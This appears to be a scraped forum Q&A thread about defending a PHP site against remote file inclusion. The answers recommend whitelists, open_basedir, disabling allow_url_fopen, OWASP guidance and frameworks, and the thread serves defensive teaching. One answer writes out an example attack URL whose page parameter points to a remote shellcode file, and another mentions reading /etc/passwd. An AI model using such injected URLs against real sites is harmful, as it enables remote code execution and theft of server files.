Best way to avoid code injection in PHP

前端 未结 10 1156
臣服心动
臣服心动 2020-12-01 05:29

My website was recently attacked by, what seemed to me as, an innocent code:



        
相关标签:
10条回答
  • 2020-12-01 06:10

    Some good answers so far, also worth pointing out a couple of PHP specifics:

    The file open functions use wrappers to support different protocols. This includes the ability to open files over a local windows network, HTTP and FTP, amongst others. Thus in a default configuration, the code in the original question can easily be used to open any arbitrary file on the internet and beyond; including, of course, all files on the server's local disks (that the webbserver user may read). /etc/passwd is always a fun one.

    Safe mode and open_basedir can be used to restrict files outside of a specific directory from being accessed.

    Also useful is the config setting allow_url_fopen, which can disable URL access to files, when using the file open functions. ini-set can be used to set and unset this value at runtime.

    These are all nice fall-back safety guards, but please use a whitelist for file inclusion.

    0 讨论(0)
  • 2020-12-01 06:10

    Think of the URL is in this format:

    www.yourwebsite.com/index.php?page=http://malicodes.com/shellcode.txt

    If the shellcode.txt runs SQL or PHP injection, then your website will be at risk, right? Do think of this, using a whitelist would be of help.

    There is a way to filter all variables to avoid the hacking. You can use PHP IDS or OSE Security Suite to help avoid the hacking. After installing the security suite, you need to activate the suite, here is the guide:

    http://www.opensource-excellence.com/shop/ose-security-suite/item/414.html

    I would suggest you turn on layer 2 protection, then all POST and GET variables will be filtered especially the one I mentioned, and if there are attacks found, it will report to you immediately/

    Safety is always the priority

    0 讨论(0)
  • 2020-12-01 06:11

    Pek, there are many things to worry about an addition to sql injection, or even different types of code injection. Now might be a good time to look a little further into web application security in general.

    From a previous question on moving from desktop to web development, I wrote:

    The OWASP Guide to Building Secure Web Applications and Web Services should be compulsory reading for any web developer that wishes to take security seriously (which should be all web developers). There are many principles to follow that help with the mindset required when thinking about security.

    If reading a big fat document is not for you, then have a look at the video of the seminar Mike Andrews gave at Google a couple years back about How To Break Web Software.

    0 讨论(0)
  • 2020-12-01 06:15

    pek, for a short term fix apply one of the solutions suggested by other users. For a mid to long term plan you should consider migrating to one of existing web frameworks. They handle all low-level stuff like routing and files inclusion in reliable, secure way, so you can focus on core functionalities.

    Do not reinvent the wheel. Use a framework. Any of them is better than none. The initial time investment in learning it pays back almost instantly.

    0 讨论(0)
提交回复
热议问题